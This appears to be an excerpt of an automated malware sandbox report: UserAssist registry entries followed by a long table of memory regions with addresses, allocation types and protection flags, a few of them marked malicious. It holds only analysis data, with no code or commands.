HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
Zvpebfbsg.Jvaqbjf.Rkcybere
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
HRZR_PGYFRFFVBA
There are 30 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
2084E000
trusted library allocation
page read and write
malicious
95CD000
direct allocation
page execute and read and write
malicious
20821000
trusted library allocation
page read and write
malicious
3FED000
remote allocation
page execute and read and write
malicious
8C10000
direct allocation
page execute and read and write
malicious
568E000
trusted library allocation
page read and write
malicious
603F000
trusted library allocation
page read and write
malicious
20871000
trusted library allocation
page read and write
malicious
4E60000
direct allocation
page read and write
7A67000
trusted library allocation
page read and write
22E52000
trusted library allocation
page read and write
695D000
stack
page read and write
33E0000
heap
page read and write
7150000
trusted library allocation
page read and write
2A7E000
heap
page read and write
4CFD000
heap
page read and write
2297A000
heap
page read and write
229A3000
heap
page read and write
4C70000
heap
page read and write
7FCF1000
trusted library allocation
page execute read
22E80000
trusted library allocation
page read and write
22E50000
trusted library allocation
page read and write
3330000
trusted library allocation
page read and write
22E50000
trusted library allocation
page read and write
7EEB0000
trusted library allocation
page execute and read and write
22E40000
trusted library allocation
page read and write
22E40000
trusted library allocation
page read and write
32F0000
trusted library allocation
page read and write
772E000
stack
page read and write
8007000
heap
page read and write
809C000
stack
page read and write
227F0000
trusted library allocation
page read and write
29D0000
trusted library allocation
page read and write
2A9A000
heap
page read and write
22E50000
trusted library allocation
page read and write
7100000
trusted library allocation
page read and write
229E2000
heap
page read and write
21BDE040000
trusted library allocation
page read and write
6E8C000
heap
page read and write
4E80000
direct allocation
page read and write
545C000
stack
page read and write
34A0000
heap
page execute and read and write
5D6D000
heap
page read and write
7FF7000
heap
page read and write
6F50000
trusted library allocation
page read and write
22E40000
trusted library allocation
page read and write
2216E1E0000
heap
page read and write
21BDE0E0000
trusted library allocation
page read and write
22E60000
trusted library allocation
page read and write
23760000
trusted library allocation
page read and write
2A74000
heap
page read and write
5D4E000
heap
page read and write
22941000
heap
page read and write
5D56000
heap
page read and write
4EE0000
direct allocation
page read and write
5D5B000
heap
page read and write
7FF6000
heap
page read and write
6FB0000
trusted library allocation
page read and write
20879000
trusted library allocation
page read and write
7D30000
trusted library allocation
page execute and read and write
8007000
heap
page read and write
A85000
heap
page read and write
22E40000
trusted library allocation
page read and write
7FC4000
heap
page read and write
87B0000
heap
page read and write
2A98000
heap
page read and write
22E40000
trusted library allocation
page read and write
4CCE000
stack
page read and write
2986000
heap
page read and write
22EA0000
trusted library allocation
page read and write
7A0000
trusted library allocation
page read and write
229A3000
heap
page read and write
22E50000
trusted library allocation
page read and write
2A88000
heap
page read and write
2FD0000
heap
page read and write
808F000
heap
page read and write
7C40000
trusted library allocation
page read and write
5B14000
trusted library allocation
page read and write
2910000
trusted library allocation
page read and write
22E80000
trusted library allocation
page read and write
2350E000
stack
page read and write
327E000
stack
page read and write
22B20000
trusted library allocation
page read and write
89F0000
heap
page read and write
4CB7000
heap
page read and write
5D5B000
heap
page read and write
2940000
heap
page read and write
6F20000
trusted library allocation
page read and write
7130000
trusted library allocation
page read and write
22E28000
trusted library allocation
page read and write
22E40000
trusted library allocation
page read and write
7B4000
trusted library allocation
page read and write
2AB2000
heap
page read and write
797B000
heap
page read and write
29C2000
trusted library allocation
page read and write
29B3000
heap
page read and write
2950000
heap
page read and write
2A11000
heap
page read and write
2A9F000
heap
page read and write
28EF000
stack
page read and write
5D32000
heap
page read and write
490A000
trusted library allocation
page read and write
47F1000
trusted library allocation
page read and write
4D08000
heap
page read and write
C31000
unkown
page execute read
C35000
unkown
page readonly
7C90000
trusted library allocation
page read and write
871D000
stack
page read and write
7BE0000
trusted library allocation
page read and write
21BDE2BE000
heap
page read and write
21BD8C00000
heap
page read and write
2A9F000
heap
page read and write
29B0000
trusted library allocation
page read and write
2EFD000
stack
page read and write
21BDF000000
heap
page read and write
74AE000
stack
page read and write
3530000
trusted library allocation
page execute and read and write
22E40000
trusted library allocation
page read and write
21BDE080000
trusted library allocation
page read and write
22E3D000
trusted library allocation
page read and write
7FB0000
trusted library allocation
page read and write
8E76A7E000
unkown
page readonly
4EC0000
direct allocation
page read and write
2B80000
heap
page read and write
7E0000
trusted library allocation
page read and write
7F5D000
stack
page read and write
5509000
trusted library allocation
page read and write
29C0000
trusted library allocation
page read and write
4E90000
direct allocation
page read and write
7FF6000
heap
page read and write
86B0000
trusted library allocation
page read and write
22E40000
trusted library allocation
page read and write
22E90000
trusted library allocation
page read and write
21BD8B30000
heap
page read and write
22EC7000
trusted library allocation
page read and write
8C7E000
stack
page read and write
22E60000
trusted library allocation
page read and write
4B95000
heap
page read and write
2940000
heap
page read and write
2910000
trusted library allocation
page read and write
22E40000
trusted library allocation
page read and write
229D6000
heap
page read and write
2A98000
heap
page read and write
7FFC000
heap
page read and write
20678000
trusted library allocation
page read and write
29D7000
trusted library allocation
page execute and read and write
22E70000
trusted library allocation
page read and write
22E30000
trusted library allocation
page read and write
8015000
heap
page read and write
6E93000
heap
page read and write
A80000
heap
page read and write
502E000
stack
page read and write
2AA3000
heap
page read and write
6EE8000
heap
page read and write
5D47000
heap
page read and write
21BD8CAE000
heap
page read and write
3320000
trusted library allocation
page read and write
21BDE260000
heap
page read and write
4D0E000
stack
page read and write
2079B000
trusted library allocation
page read and write
689B000
stack
page read and write
795C000
heap
page read and write
8060000
heap
page read and write
8891000
heap
page read and write
22E40000
trusted library allocation
page read and write
6E29AFE000
stack
page read and write
4CC7000
trusted library allocation
page read and write
2AEF000
heap
page read and write
7FDA000
heap
page read and write
7A40000
trusted library allocation
page read and write
22E60000
trusted library allocation
page read and write
701E000
stack
page read and write
4EF1000
trusted library allocation
page read and write
22E50000
trusted library allocation
page read and write
7CA0000
trusted library allocation
page read and write
8760000
heap
page read and write
204FF000
stack
page read and write
32B0000
heap
page read and write
20854000
trusted library allocation
page read and write
22E50000
trusted library allocation
page read and write
2DED000
stack
page read and write
21BD8CFE000
heap
page read and write
2A93000
heap
page read and write
3078000
heap
page read and write
3465000
heap
page read and write
205D0000
heap
page read and write
4D0C000
heap
page read and write
3070000
heap
page read and write
7A70000
trusted library allocation
page read and write
4541000
trusted library allocation
page read and write
4DAE000
stack
page read and write
3309000
heap
page read and write
33AF000
stack
page read and write
2A72000
heap
page read and write
3360000
trusted library allocation
page read and write
21BD9500000
heap
page read and write
22E60000
trusted library allocation
page read and write
2B40000
heap
page execute and read and write
22E50000
trusted library allocation
page read and write
5D20000
heap
page read and write
21BD8C9C000
heap
page read and write
8E7647E000
unkown
page readonly
21BDE010000
trusted library allocation
page read and write
2A2C000
heap
page read and write
897D000
stack
page read and write
29E0000
heap
page read and write
800B000
heap
page read and write
8015000
heap
page read and write
22E50000
trusted library allocation
page read and write
2036F000
stack
page read and write
21BDE2D3000
heap
page read and write
7320000
heap
page execute and read and write
21BD8CA2000
heap
page read and write
8E769FE000
stack
page read and write
21BD8D13000
heap
page read and write
20796000
trusted library allocation
page read and write
22E40000
trusted library allocation
page read and write
68DE000
stack
page read and write
808D000
heap
page read and write
705F000
stack
page read and write
6A2B000
stack
page read and write
5D10000
heap
page read and write
7BD0000
trusted library allocation
page execute and read and write
C4D000
unkown
page readonly
5D56000
heap
page read and write
22E50000
trusted library allocation
page read and write
7C30000
trusted library allocation
page read and write
6D32000
heap
page read and write
8E753FE000
stack
page read and write
8760000
heap
page read and write
6BA0000
heap
page read and write
23750000
trusted library allocation
page read and write
21BD8A30000
heap
page read and write
22EC0000
trusted library allocation
page read and write
6F47000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
5EB9000
trusted library allocation
page read and write
21BD93C1000
trusted library allocation
page read and write
43AE000
stack
page read and write
4916000
trusted library allocation
page read and write
202BF000
stack
page read and write
3230000
heap
page read and write
22E30000
trusted library allocation
page read and write
5B40000
heap
page read and write
8015000
heap
page read and write
2041E000
stack
page read and write
8D70000
direct allocation
page read and write
9FCD000
direct allocation
page execute and read and write
22840000
heap
page execute and read and write
6F18000
heap
page read and write
21BDE150000
trusted library allocation
page read and write
88C5000
heap
page read and write
29D0000
heap
page read and write
21BDE288000
heap
page read and write
22E50000
trusted library allocation
page read and write
5D4B000
heap
page read and write
2A4D000
heap
page read and write
8E75B7E000
unkown
page readonly
463D000
trusted library allocation
page read and write
21BD9400000
heap
page read and write
2BE6000
heap
page read and write
2A9F000
heap
page read and write
7E5000
trusted library allocation
page execute and read and write
311F000
unkown
page read and write
29D2000
trusted library allocation
page read and write
33E0000
heap
page read and write
23770000
trusted library allocation
page read and write
2A7C000
stack
page read and write
8A3B000
heap
page read and write
22E60000
trusted library allocation
page read and write
2A8D000
heap
page read and write
23750000
trusted library allocation
page read and write
5D56000
heap
page read and write
22E50000
trusted library allocation
page read and write
8007000
heap
page read and write
8E743EB000
stack
page read and write
2A11000
heap
page read and write
4830000
trusted library allocation
page read and write
331D000
trusted library allocation
page execute and read and write
4CC4000
heap
page read and write
4D8E000
stack
page read and write
74EB000
stack
page read and write
7DA000
trusted library allocation
page execute and read and write
746A000
stack
page read and write
7120000
trusted library allocation
page read and write
8E7607E000
unkown
page readonly
6E98000
heap
page read and write
2079E000
trusted library allocation
page read and write
80DE000
stack
page read and write
776E000
stack
page read and write
4DF0000
trusted library allocation
page read and write
81FF000
stack
page read and write
7C60000
trusted library allocation
page read and write
23780000
trusted library allocation
page read and write
2074C000
stack
page read and write
31AE000
stack
page read and write
340C000
heap
page read and write
4AB3000
trusted library allocation
page read and write
21BD8D02000
heap
page read and write
8140000
heap
page read and write
6FD0000
trusted library allocation
page read and write
22B20000
heap
page read and write
7B90000
heap
page read and write
28FF000
stack
page read and write
3340000
trusted library allocation
page read and write
22E3D000
trusted library allocation
page read and write
2AB2000
heap
page read and write
22B20000
trusted library allocation
page read and write
77EE000
stack
page read and write
685D000
stack
page read and write
22E50000
trusted library allocation
page read and write
5484000
trusted library allocation
page read and write
23550000
trusted library allocation
page read and write
2A44000
heap
page read and write
2AB3000
heap
page read and write
29A3000
trusted library allocation
page execute and read and write
22E60000
trusted library allocation
page read and write
4CAD000
heap
page read and write
7325000
heap
page execute and read and write
7FC3000
heap
page read and write
4C57000
heap
page read and write
C35000
unkown
page readonly
2A93000
heap
page read and write
5D4E000
heap
page read and write
5D5E000
heap
page read and write
2A74000
heap
page read and write
23750000
trusted library allocation
page read and write
22E60000
trusted library allocation
page read and write
89BC000
stack
page read and write
8BD0000
trusted library allocation
page read and write
22E40000
trusted library allocation
page read and write
5482000
trusted library allocation
page read and write
7BC0000
trusted library allocation
page read and write
57CC000
stack
page read and write
7180000
trusted library allocation
page read and write
22E50000
trusted library allocation
page read and write
8E74D7B000
stack
page read and write
22E60000
trusted library allocation
page read and write
4DCF000
stack
page read and write
21BD9402000
heap
page read and write
21BD8C90000
heap
page read and write
699A000
stack
page read and write
8015000
heap
page read and write
70DD000
stack
page read and write
33DE000
stack
page read and write
2AB6000
heap
page read and write
21BD8C13000
heap
page read and write
21BD8B60000
trusted library allocation
page read and write
21BD8C76000
heap
page read and write
8E7507E000
unkown
page readonly
2DA0000
heap
page read and write
202E0000
trusted library allocation
page read and write
4D00000
heap
page read and write
8860000
heap
page read and write
7C70000
trusted library allocation
page read and write
2A24000
heap
page read and write
6EA2000
heap
page read and write
4970000
heap
page read and write
7CF0000
trusted library allocation
page read and write
2DA5000
heap
page read and write
22E50000
trusted library allocation
page read and write
53DF000
stack
page read and write
54E1000
trusted library allocation
page read and write
22E50000
trusted library allocation
page read and write
481C000
trusted library allocation
page read and write
2A98000
heap
page read and write
C30000
unkown
page readonly
4AB1000
trusted library allocation
page read and write
7110000
trusted library allocation
page read and write
3300000
heap
page read and write
2295F000
heap
page read and write
73F000
stack
page read and write
801E000
stack
page read and write
88FF000
heap
page read and write
22E30000
trusted library allocation
page read and write
22E40000
trusted library allocation
page read and write
7CEB000
stack
page read and write
20510000
direct allocation
page read and write
3342000
trusted library allocation
page read and write
80B7000
heap
page read and write
207AE000
trusted library allocation
page read and write
2DE0000
heap
page read and write
4CB3000
trusted library allocation
page read and write
7B3000
trusted library allocation
page execute and read and write
22E1E000
stack
page read and write
4EB0000
direct allocation
page read and write
21BDE011000
trusted library allocation
page read and write
22D9E000
stack
page read and write
23750000
trusted library allocation
page read and write
88A9000
heap
page read and write
2A2F000
heap
page read and write
5D56000
heap
page read and write
5D5B000
heap
page read and write
3E80000
remote allocation
page execute and read and write
C37000
unkown
page readonly
3447000
heap
page read and write
4946000
trusted library allocation
page read and write
4BD000
stack
page read and write
21BD8C6F000
heap
page read and write
736B000
stack
page read and write
573F000
stack
page read and write
8120000
heap
page read and write
5D64000
heap
page read and write
2978000
heap
page read and write
2AA4000
heap
page read and write
22E40000
trusted library allocation
page read and write
8E75D7E000
unkown
page readonly
21BDE302000
heap
page read and write
23550000
trusted library allocation
page read and write
2A72000
heap
page read and write
23550000
trusted library allocation
page read and write
555000
heap
page read and write
8891000
heap
page read and write
2A83000
heap
page read and write
29A4000
trusted library allocation
page read and write
22E20000
trusted library allocation
page read and write
31AD000
stack
page read and write
4ED0000
direct allocation
page read and write
808A000
heap
page read and write
2BFE000
unkown
page read and write
2A98000
heap
page read and write
207F1000
trusted library allocation
page read and write
76E000
stack
page read and write
8065000
heap
page read and write
8091000
heap
page read and write
4B90000
heap
page read and write
8E7527E000
unkown
page readonly
22E40000
trusted library allocation
page read and write
2056A000
stack
page read and write
207D0000
trusted library allocation
page read and write
2084C000
trusted library allocation
page read and write
229D4000
heap
page read and write
3240000
heap
page read and write
7F9E000
stack
page read and write
23560000
trusted library allocation
page read and write
22E50000
trusted library allocation
page read and write
7E2000
trusted library allocation
page read and write
4B7000
stack
page read and write
4D14000
heap
page read and write
87D0000
trusted library allocation
page read and write
8000000
heap
page read and write
6E29B7E000
stack
page read and write
8147000
heap
page read and write
237A0000
trusted library allocation
page execute and read and write
2A7F000
heap
page read and write
2A8F000
heap
page read and write
21BD9415000
heap
page read and write
6E8F000
heap
page read and write
7FCF000
heap
page read and write
BDE000
stack
page read and write
C31000
unkown
page execute read
2A6E000
heap
page read and write
2D7E000
stack
page read and write
22DDE000
stack
page read and write
22E50000
trusted library allocation
page read and write
4E4E000
stack
page read and write
8E7637B000
stack
page read and write
731D000
stack
page read and write
8091000
heap
page read and write
4F10000
direct allocation
page read and write
2A91000
heap
page read and write
8E76179000
stack
page read and write
2A8D000
heap
page read and write
22E40000
trusted library allocation
page read and write
8C30000
trusted library allocation
page execute and read and write
80B4000
heap
page read and write
8D10000
direct allocation
page read and write
22E50000
trusted library allocation
page read and write
2283C000
stack
page read and write
31B0000
heap
page read and write
5D4E000
heap
page read and write
5D6D000
heap
page read and write
2A93000
heap
page read and write
21BD951A000
heap
page read and write
8E754FE000
stack
page read and write
2E26000
heap
page read and write
7FC5000
heap
page read and write
7FE0000
heap
page read and write
22E30000
trusted library allocation
page read and write
21BDE160000
trusted library allocation
page read and write
21BDE22C000
heap
page read and write
8D20000
direct allocation
page read and write
7C10000
trusted library allocation
page read and write
29E0000
trusted library allocation
page execute and read and write
8065000
heap
page read and write
2A6E000
heap
page read and write
808D000
heap
page read and write
21BDE054000
trusted library allocation
page read and write
3488000
trusted library allocation
page read and write
539E000
stack
page read and write
22E50000
trusted library allocation
page read and write
4CC4000
heap
page read and write
811C000
stack
page read and write
2216FCB0000
heap
page read and write
4EF0000
direct allocation
page read and write
22E30000
trusted library allocation
page read and write
294D000
heap
page read and write
709E000
stack
page read and write
808D000
heap
page read and write
21BDE1B0000
remote allocation
page read and write
79F0000
heap
page read and write
7BF0000
heap
page read and write
8015000
heap
page read and write
23760000
trusted library allocation
page read and write
49ED000
remote allocation
page execute and read and write
22E40000
trusted library allocation
page read and write
B5B000
stack
page read and write
22965000
heap
page read and write
7B3E000
stack
page read and write
5D47000
heap
page read and write
8CE0000
direct allocation
page read and write
541B000
stack
page read and write
2AC8000
heap
page read and write
446E000
stack
page read and write
205C0000
trusted library allocation
page read and write
442E000
stack
page read and write
769000
heap
page read and write
6F1A000
heap
page read and write
554A000
trusted library allocation
page read and write
21BDE2E4000
heap
page read and write
2A7F000
heap
page read and write
21BDE2CB000
heap
page read and write
22E60000
trusted library allocation
page read and write
22E50000
trusted library allocation
page read and write
3010000
heap
page read and write
5D5C000
heap
page read and write
7190000
trusted library allocation
page read and write
29F6000
heap
page read and write
7940000
heap
page read and write
2A44000
heap
page read and write
7570000
heap
page read and write
8E752FE000
stack
page read and write
7FF6000
heap
page read and write
5D5E000
heap
page read and write
A7C2000
trusted library allocation
page read and write
8060000
heap
page read and write
20480000
remote allocation
page read and write
229A3000
heap
page read and write
2A9F000
heap
page read and write
8055000
heap
page read and write
29C0000
heap
page read and write
2A9A000
heap
page read and write
21BDE000000
trusted library allocation
page read and write
8E75F7E000
unkown
page readonly
5E91000
trusted library allocation
page read and write
8007000
heap
page read and write
22E30000
trusted library allocation
page read and write
204BE000
stack
page read and write
8D80000
direct allocation
page read and write
44E1000
trusted library allocation
page read and write
29C6000
trusted library allocation
page execute and read and write
5D62000
heap
page read and write
2AAF000
heap
page read and write
47D3000
heap
page read and write
21BD9502000
heap
page read and write
22E43000
trusted library allocation
page read and write
23550000
trusted library allocation
page read and write
21BDE2FD000
heap
page read and write
48DA000
stack
page read and write
3329000
trusted library allocation
page read and write
22E40000
trusted library allocation
page read and write
2216E375000
heap
page read and write
2A2F000
heap
page read and write
66E000
stack
page read and write
4803000
trusted library allocation
page read and write
22E40000
trusted library allocation
page read and write
22E20000
trusted library allocation
page read and write
8E75E7E000
stack
page read and write
22E47000
trusted library allocation
page read and write
71B0000
trusted library allocation
page read and write
22E50000
trusted library allocation
page read and write
8E759FE000
unkown
page readonly
21BD8D29000
heap
page read and write
22E50000
trusted library allocation
page read and write
89FD000
heap
page read and write
4807000
trusted library allocation
page read and write
22EC0000
trusted library allocation
page read and write
2930000
trusted library allocation
page execute and read and write
207C2000
trusted library allocation
page read and write
2A91000
heap
page read and write
C1F000
stack
page read and write
7FD8000
heap
page read and write
4F7000
stack
page read and write
2084A000
trusted library allocation
page read and write
22E40000
trusted library allocation
page read and write
22E50000
trusted library allocation
page read and write
20880000
trusted library allocation
page read and write
29FE000
heap
page read and write
29D5000
trusted library allocation
page execute and read and write
2D9B000
heap
page read and write
2A4D000
heap
page read and write
89F9000
heap
page read and write
20480000
remote allocation
page read and write
724E000
stack
page read and write
71A0000
trusted library allocation
page read and write
8E74B7E000
stack
page read and write
2E2E000
heap
page read and write
79E4000
heap
page read and write
8060000
heap
page read and write
22E50000
trusted library allocation
page read and write
6026000
trusted library allocation
page read and write
8E7517B000
stack
page read and write
7C00000
trusted library allocation
page read and write
22A20000
heap
page read and write
2216E0B0000
heap
page read and write
3540000
trusted library allocation
page read and write
7BD000
trusted library allocation
page execute and read and write
C31000
unkown
page execute read
2DD0000
heap
page read and write
88FF000
heap
page read and write
5D5B000
heap
page read and write
9460000
direct allocation
page execute and read and write
2027D000
stack
page read and write
51AE000
stack
page read and write
207A2000
trusted library allocation
page read and write
808A000
heap
page read and write
A60000
heap
page read and write
69E5000
heap
page execute and read and write
808D000
heap
page read and write
2A72000
heap
page read and write
6AAD000
stack
page read and write
8091000
heap
page read and write
C30000
unkown
page readonly
4C91000
heap
page read and write
6E20000
heap
page read and write
C4D000
unkown
page readonly
5496000
trusted library allocation
page read and write
4F00000
direct allocation
page read and write
22E50000
trusted library allocation
page read and write
7F720000
trusted library allocation
page execute and read and write
22E20000
trusted library allocation
page read and write
2A9A000
heap
page read and write
7BB0000
trusted library allocation
page read and write
22E70000
trusted library allocation
page read and write
2AE0000
heap
page read and write
8E756FE000
stack
page read and write
4CC9000
trusted library allocation
page read and write
800B000
heap
page read and write
8E74977000
stack
page read and write
4CB7000
trusted library allocation
page read and write
22E50000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
47C000
stack
page read and write
480C000
trusted library allocation
page read and write
32D0000
trusted library section
page read and write
7910000
heap
page execute and read and write
31EF000
stack
page read and write
4DCE000
stack
page read and write
2AD3000
heap
page read and write
3345000
trusted library allocation
page execute and read and write
21BD8C8B000
heap
page read and write
691F000
stack
page read and write
2A9A000
heap
page read and write
6F30000
trusted library allocation
page read and write
23550000
trusted library allocation
page read and write
2AB6000
heap
page read and write
203DE000
stack
page read and write
207B1000
trusted library allocation
page read and write
8060000
heap
page read and write
2A77000
heap
page read and write
7CD0000
trusted library allocation
page read and write
31BB000
heap
page read and write
7170000
trusted library allocation
page read and write
5D57000
heap
page read and write
8B9C000
stack
page read and write
23750000
trusted library allocation
page read and write
2032E000
stack
page read and write
7FF7000
heap
page read and write
A5E000
stack
page read and write
4B40000
heap
page read and write
2ABA000
heap
page read and write
5D4C000
heap
page read and write
4CC1000
heap
page read and write
21859000
trusted library allocation
page read and write
4D16000
heap
page read and write
22E30000
trusted library allocation
page read and write
8060000
heap
page read and write
8E75AFE000
stack
page read and write
2DDC000
stack
page read and write
80B3000
heap
page read and write
506F000
stack
page read and write
337D000
heap
page read and write
21BD9A70000
trusted library section
page readonly
22E50000
trusted library allocation
page read and write
2086D000
trusted library allocation
page read and write
22E40000
trusted library allocation
page read and write
2B1E000
stack
page read and write
8091000
heap
page read and write
8007000
heap
page read and write
4EA0000
direct allocation
page read and write
6CDE000
stack
page read and write
88B4000
heap
page read and write
22E40000
trusted library allocation
page read and write
5A0E000
stack
page read and write
22D5D000
stack
page read and write
22B20000
trusted library allocation
page read and write
6BB0000
heap
page read and write
22E40000
trusted library allocation
page read and write
22930000
heap
page read and write
2AE4000
heap
page read and write
6B9000
heap
page read and write
2A8D000
heap
page read and write
4D6E000
stack
page read and write
21BDE0E0000
trusted library allocation
page read and write
22E77000
trusted library allocation
page read and write
21BD9FA0000
trusted library allocation
page read and write
760000
heap
page read and write
23750000
trusted library allocation
page read and write
207AA000
trusted library allocation
page read and write
2216E0E8000
heap
page read and write
2061E000
stack
page read and write
5D48000
heap
page read and write
2D70000
heap
page read and write
4CBD000
heap
page read and write
884C000
stack
page read and write
21BD93E0000
trusted library allocation
page read and write
2BEA000
heap
page read and write
8770000
trusted library allocation
page execute and read and write
2288C000
stack
page read and write
742E000
stack
page read and write
2A6E000
heap
page read and write
8CBC000
stack
page read and write
436E000
stack
page read and write
7BA0000
trusted library allocation
page execute and read and write
8D30000
direct allocation
page read and write
80B3000
heap
page read and write
7AFE000
stack
page read and write
4872000
trusted library allocation
page read and write
8008000
heap
page read and write
22E43000
trusted library allocation
page read and write
21BD9A90000
trusted library section
page readonly
31EE000
stack
page read and write
4900000
heap
page read and write
6F5A000
trusted library allocation
page read and write
5D62000
heap
page read and write
22E80000
trusted library allocation
page read and write
22E40000
trusted library allocation
page read and write
2078D000
stack
page read and write
29BD000
trusted library allocation
page execute and read and write
356B000
heap
page read and write
8E74F7C000
stack
page read and write
C37000
unkown
page readonly
22E50000
trusted library allocation
page read and write
22E40000
trusted library allocation
page read and write
22A21000
heap
page read and write
22E40000
trusted library allocation
page read and write
4B97000
heap
page read and write
2AA3000
heap
page read and write
21BD8B70000
trusted library section
page read and write
80B3000
heap
page read and write
4CBD000
heap
page read and write
23750000
trusted library allocation
page read and write
6F40000
trusted library allocation
page read and write
4ED0000
heap
page read and write
2AB8000
heap
page read and write
7A50000
trusted library allocation
page read and write
4E70000
direct allocation
page read and write
8015000
heap
page read and write
22E40000
trusted library allocation
page read and write
21BD8CAA000
heap
page read and write
21BDE040000
trusted library allocation
page read and write
21BD9A50000
trusted library section
page readonly
7920000
trusted library allocation
page read and write
44E6000
trusted library allocation
page read and write
C30000
unkown
page readonly
2A7A000
heap
page read and write
229A3000
heap
page read and write
201BE000
stack
page read and write
22E50000
trusted library allocation
page read and write
58CF000
stack
page read and write
3037000
stack
page read and write
8CC0000
direct allocation
page read and write
22E50000
trusted library allocation
page read and write
893C000
stack
page read and write
5D62000
heap
page read and write
6B0000
heap
page read and write
22E70000
trusted library allocation
page read and write
4C1F000
stack
page read and write
2216DFD0000
heap
page read and write
C00000
heap
page read and write
2065E000
stack
page read and write
8900000
heap
page read and write
29E8000
heap
page read and write
8370000
trusted library allocation
page read and write
21BD955A000
heap
page read and write
8D60000
direct allocation
page read and write
22E40000
trusted library allocation
page read and write
2A91000
heap
page read and write
21BDE200000
heap
page read and write
8C20000
trusted library allocation
page read and write
8BE0000
trusted library allocation
page read and write
5D5B000
heap
page read and write
21BDE284000
heap
page read and write
23750000
trusted library allocation
page read and write
2DE8000
heap
page read and write
5D47000
heap
page read and write
7AE000
stack
page read and write
4CFE000
heap
page read and write
6E39000
heap
page read and write
22BC0000
trusted library allocation
page read and write
7FC0000
heap
page read and write
29DB000
trusted library allocation
page execute and read and write
23560000
trusted library allocation
page read and write
8E75FFE000
stack
page read and write
23750000
trusted library allocation
page read and write
229D1000
heap
page read and write
8D50000
direct allocation
page read and write
205A8000
stack
page read and write
5D5E000
heap
page read and write
8E74A7E000
unkown
page readonly
21BDE2F3000
heap
page read and write
6E88000
heap
page read and write
88A9000
heap
page read and write
20520000
direct allocation
page read and write
550000
heap
page read and write
20861000
trusted library allocation
page read and write
7590000
heap
page read and write
8A9B000
stack
page read and write
2A9F000
heap
page read and write
2AD3000
heap
page read and write
7812000
heap
page read and write
315E000
stack
page read and write
2A72000
heap
page read and write
7FD0000
heap
page read and write
875E000
stack
page read and write
22E7E000
trusted library allocation
page read and write
22E70000
trusted library allocation
page read and write
3390000
heap
page read and write
22EB0000
trusted library allocation
page read and write
22910000
heap
page read and write
23750000
trusted library allocation
page read and write
4E80000
heap
page read and write
294D000
stack
page read and write
2085F000
trusted library allocation
page read and write
2ABF000
heap
page read and write
77AE000
stack
page read and write
7BBD000
stack
page read and write
89D0000
heap
page read and write
5D5B000
heap
page read and write
80FE000
stack
page read and write
7C50000
trusted library allocation
page read and write
2900000
heap
page readonly
22E30000
trusted library allocation
page read and write
808D000
heap
page read and write
728F000
stack
page read and write
2216E0E0000
heap
page read and write
2A93000
heap
page read and write
69DE000
stack
page read and write
7FFF000
heap
page read and write
770000
heap
page read and write
22E8D000
stack
page read and write
3313000
trusted library allocation
page execute and read and write
2BE0000
heap
page read and write
494D000
trusted library allocation
page read and write
7BF0000
trusted library allocation
page read and write
2D90000
heap
page read and write
6E29A7C000
stack
page read and write
2A9A000
heap
page read and write
21BD93F0000
trusted library allocation
page read and write
8D00000
direct allocation
page read and write
8015000
heap
page read and write
88FF000
heap
page read and write
2CF0000
heap
page read and write
6FA0000
heap
page execute and read and write
C10000
heap
page read and write
4DE0000
heap
page read and write
21BD8C5B000
heap
page read and write
68E000
stack
page read and write
21BDE010000
trusted library allocation
page read and write
8BF0000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
523F000
stack
page read and write
8E7587E000
stack
page read and write
6A6E000
stack
page read and write
22EA0000
trusted library allocation
page read and write
23550000
trusted library allocation
page read and write
7FDE000
stack
page read and write
2AE6000
heap
page read and write
29AD000
trusted library allocation
page execute and read and write
5D62000
heap
page read and write
22E60000
trusted library allocation
page read and write
303E000
stack
page read and write
21BD9691000
trusted library allocation
page read and write
22E50000
trusted library allocation
page read and write
22E70000
trusted library allocation
page read and write
530000
heap
page read and write
7CF7000
trusted library allocation
page read and write
21BD9A80000
trusted library section
page readonly
4E0F000
stack
page read and write
5D60000
heap
page read and write
4CC1000
heap
page read and write
22E50000
trusted library allocation
page read and write
5D62000
heap
page read and write
80BA000
heap
page read and write
7FDC000
heap
page read and write
22E40000
trusted library allocation
page read and write
88BE000
heap
page read and write
4930000
trusted library allocation
page read and write
2A2F000
heap
page read and write
43EE000
stack
page read and write
2AB2000
heap
page read and write
34EE000
stack
page read and write
8E7557E000
unkown
page readonly
5D48000
heap
page read and write
486E000
trusted library allocation
page read and write
22800000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
5D4E000
heap
page read and write
23790000
trusted library allocation
page read and write
7BC0000
trusted library allocation
page read and write
22E40000
trusted library allocation
page read and write
5D65000
heap
page read and write
21BD9513000
heap
page read and write
3314000
trusted library allocation
page read and write
8055000
heap
page read and write
22E60000
trusted library allocation
page read and write
495E000
trusted library allocation
page read and write
29A0000
trusted library allocation
page read and write
7C9F000
stack
page read and write
7FC9000
heap
page read and write
23780000
trusted library allocation
page read and write
207B6000
trusted library allocation
page read and write
2E1D000
heap
page read and write
7160000
trusted library allocation
page read and write
22E40000
trusted library allocation
page read and write
88F7000
heap
page read and write
2B8B000
heap
page read and write
88A9000
heap
page read and write
21BDE253000
heap
page read and write
22E50000
trusted library allocation
page read and write
3090000
heap
page read and write
835E000
stack
page read and write
21BDE160000
trusted library allocation
page read and write
22E50000
trusted library allocation
page read and write
2AA3000
heap
page read and write
4CBD000
heap
page read and write
8E7537E000
unkown
page readonly
86A0000
trusted library allocation
page read and write
2990000
trusted library allocation
page read and write
2A74000
heap
page read and write
2A9A000
heap
page read and write
2A9F000
heap
page read and write
21BD951A000
heap
page read and write
2BB0000
heap
page read and write
76B000
stack
page read and write
23480000
trusted library allocation
page read and write
21BDE2F1000
heap
page read and write
21BD8A50000
heap
page read and write
2216E370000
heap
page read and write
69E0000
heap
page execute and read and write
2AC1000
heap
page read and write
21BDE2E8000
heap
page read and write
2A98000
heap
page read and write
C37000
unkown
page readonly
7B0000
trusted library allocation
page read and write
21BDE083000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
4C8C000
stack
page read and write
805C000
stack
page read and write
B9E000
stack
page read and write
7A60000
trusted library allocation
page read and write
22E41000
trusted library allocation
page read and write
22E80000
